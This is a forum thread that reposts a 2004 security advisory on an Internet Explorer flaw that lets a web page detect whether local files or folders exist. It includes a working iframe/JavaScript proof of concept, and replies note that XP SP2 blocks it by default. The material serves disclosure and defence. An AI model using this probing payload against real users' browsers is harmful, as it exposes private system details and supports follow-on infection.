Results 1 to 5 of 5

Thread: Internet Explorer Local File/Directory Detection

  1. #1
    Senior Member
    Join Date
    Oct 2002
    Posts
    4,055

    Internet Explorer Local File/Directory Detection

    From Zone-H.org:
    08/25/2004

    Description:
    ============

    This vulnerability, are based on the equal characteristics discovered by the
    company GreyMagic Software of Israel in some of the versions of the
    navigator Opera.

    This bug also is available in the popular MS Internet Explorer, which could
    be operated by a remote user to acquire sensible data of a remote system.
    When a file or directory is assigned iframe that does not exist, this
    navigator will generate an error. A remote user can create code HTML that
    loads iframe and changes to the URL from this resource to a file or local
    directory, and then detects if there is that error to determine if that
    element exists.

    Proof Of Concept (POC/Exploit):
    ===============================

    -------------------------

    <iframe src="http://www.lafrase.net"></iframe>
    <script type="text/javascript">
    onload=function () {
    var sLocal="C:/some_file_or_folder";
    frames[0].location.href=sLocal;
    setTimeout(
    function () {
    try {
    frames[0].document;
    alert(sLocal+" does not exists.\nHere could execute a script that infects
    the computer with some virus, trojan, etc");
    } catch (oErr) {
    alert(sLocal+" Exists.\nThen do nothing");
    }
    },
    250
    );
    }
    </script>

    -------------------------

    Tested on:
    ==========

    MS Internet Explorer 6.0.2800.1106 (SP1,Q867801) Win9x
    MS Internet Explorer 5.0 Windows 2000

    Also in Mozilla Firefox without success.

    More Info:
    ==========

    Opera Local File/Directory Detection.
    http://www.greymagic.com/security/advisories/gm009-op/

    Disclaimer:
    ===========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    We are not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    Version en
    EspaƱol:
    ===================
    http://www.rzw.com.ar/article1820-In...-archivo-local

    --
    Martin [XyborG] Aberastegue
    http://www.rzw.com.ar
    http://www.lafrase.net
    Here's some more information..
    Space For Rent.. =]

  2. #2

  3. #3
    Senior Member
    Join Date
    Feb 2002
    Posts
    130
    Cool, IE6 SP2 blocks it by default (see screenshot), is this the first new vulnerability found that XP SP2 is not vulnerable to ?

    I say not vulnerable, if the users click the toolbar at the top then click allow it would run, but if they are that crazy thehn I guess there is no helping them

  4. #4
    Senior Member
    Join Date
    Oct 2002
    Posts
    4,055
    is this the first new vulnerability found that XP SP2 is not vulnerable to ?
    Although I'm not entirely sure, this would be something quite nice for XP SP2 user's. Glad to see it blocks it by default, makes it less strenuous for users in general.
    Space For Rent.. =]

  5. #5
    AO French Antique News Whore
    Join Date
    Aug 2001
    Posts
    2,126
    It's block by default! All active content is block if the webpage is locally! (Can be block locally and from a Cd-Rom)
    -Simon \"SDK\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •